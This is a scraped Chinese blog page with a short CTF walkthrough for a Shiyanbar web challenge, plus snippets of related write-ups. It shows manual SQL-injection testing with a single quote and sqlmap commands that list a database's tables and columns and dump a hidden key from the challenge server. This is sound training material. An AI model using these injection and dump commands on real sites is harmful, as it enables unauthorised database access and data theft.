1. 程式人生 > >這個看起來有點簡單!--實驗吧

這個看起來有點簡單!--實驗吧

手工檢測是否存在sql注入(經典id=1'加入單引號提交,結果:如果出現錯誤提示,則該網站可能就存在注入漏洞)
使用sqlmap爆出當前資料庫my_db 發現可能藏有key值的thiskey表 進一步爆出欄位k0y並得到key值。

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns --hex







相關推薦

這個起來有點簡單!--實驗

手工檢測是否存在sql注入(經典id=1'加入單引號提交,結果:如果出現錯誤提示,則該網站可能就存在注入漏洞) 使用sqlmap爆出當前資料庫my_db 發現可能藏有key值的thiskey表 進

實驗-CTF-web-忘記密碼了&&這個起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url,改為http

實驗ctf題庫:這個起來有點簡單

       這是一道十分基礎的web題目,因為我也是剛剛接觸ctf,記錄一下第一道題的解題過程,算是自己的一個回顧吧,同時也給一些想要入門的朋友一點點微弱的參考吧。一、sqlmap的安裝       在windows下安裝sqlmap需要先下載適用windows的sqlma

實驗-CTF-web-忘記密碼了&&這個起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url

實驗ctf-web題:這個起來有點簡單

從今天開始做實驗吧的CTF習題,爭取一天一道,一天一總結,做到不貪多,不糊弄,每天學習一點點,每天進步一點點。 今天做的是這個看起來有點簡單這個題,是一道SQL注入的題目。用了兩種方法,一種就是從url進行sql注入,一種是使用sqlmap工具。 預

【fairy】實驗——這個起來有點簡單!

emmmm。sql注入,先試試sqlmap【我才不是不會手注呢,好吧,真的不會!! (1)爆庫: sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=2" --dbs (2)爆表:sqlmap -u "h

union註入的幾道ctf題,實驗簡單的sql註入1,2,這個起來有點簡單和bugku的成績單

需要 簡單 details 9.png lmap bug 輸入數據 php 接下來 這幾天在做CTF當中遇到了幾次sql註入都是union,寫篇博客記錄學習一下。 首先推薦一篇文章“https://blog.csdn.net/Litbai_zhan

這個起來有點簡單!

Topic Linkhttp://ctf5.shiyanbar.com/8/index.php1)  先進行測試發現存在注入漏洞2)爆庫 3) 爆表4) 爆段5) 爆koy第二種做法2)爆庫3)爆表4)

實驗 起來有點難(手工註入加sqlmap註入)

wid ati 實驗 alt 成功 技術 pytho code login 嗯~打開題目看見一個逼格有點高的圖 查看網頁源代碼,表單以get的方式傳送三個參數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制

實驗-CTF-web-頭有點大&&貌似有點難&&起來有點難(學習筆記)

實驗環境 sqlmap(kali2.0) BurpsuitePro-v1.6 firefox 頭有點大 題目連結:http://www.shiyanbar.com/ctf/29 打開發現說缺少 .net framework9.9,但是沒有9.9版本,還要求在英格蘭地區

實驗--起來有點難--盲注+burpsuite爆破

看起來有點難解題思路 1.觀察題目,使用者名稱和密碼這兩個引數都是通過GET方法傳輸。 2.通過對admin、pass兩個引數的測試,得出以下結論。 1)使用者名稱為admin時,返回“登陸失敗,錯誤的使用者名稱和密碼”。 2)使用者名稱為非admin欄位的時候,返回“資料庫連線失敗

實驗 起來有點難(手工注入加sqlmap注入)

嗯~開啟題目看見一個逼格有點高的圖 檢視網頁原始碼,表單以get的方式傳送三個引數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制,形同虛設。我們可以用按瀏覽器的F12,改變其值的大小,或者在URL欄中輸入都可以。 然後我們在輸入框中隨便

【fairy】實驗——起來有點

題目連結:ctf5.shiyanbar.com/basic/inject/index.php 看起來像是注入,比較菜,就直接sqlmap了= = 1)爆庫:sqlmap -u “ctf5.shiyanbar.com/basic/inject/index.php?adm

實驗——web之“起來有點難”詳解

連結: 工具:kali(sqlmap) 解題思路及方法: 首先進入題目連結,看到這個分值,不禁讓我很擔心,這還是我第一個50分值的題目,而且難度也是難,給的說明也是那麼霸氣。。。。。。。 這些資訊都在向我們透露這題的難度,我也是抱著嘗試的心理去試試,並沒想

實驗-起來有點難【基於sleep的sql注入指令碼】

                原題內容: 切,你那水平也就這麼點了,這都是什麼題啊!!! 解題

實驗這題起來簡單

index.php 分享圖片 name alt where select bar nbsp .sh 知識點:查詢庫名:union select 1,schema_name from information_schema.schemata     查詢表名:un

26.起來有點

web安全 sql註入 sqli ctf sqlmap 這題進入以後用時間註入測試一下,成功: 之後就是自己寫了個代碼:(寫的比較破,將就看看) #!/usr/bin/python #coding=utf-8 import requests import sys #計算長度

Java單例模式——並非起來那麼簡單

       Java中單例(Singleton)模式是一種廣泛使用的設計模式。單例模式的主要作用是保證在Java程式中,某個類只有一個例項存在。一些管理器和控制器常被設計成單例模式。 單例模式

ctf解題--起來有點

題目 解題 sqlmap.py -u "http://ctf1.shiyanbar.com/basic/inject/index.php?admin=&pass=&action=login" --dbs 查表(有username

實驗 貌似有點難 偽造ip

ons tar 得到 alt ont bsp targe fcm -h 解題鏈接: http://ctf5.shiyanbar.com/phpaudit/ 解答: 點擊View the source code —>代碼顯示IP為1.1.1.1即可得到KEY—>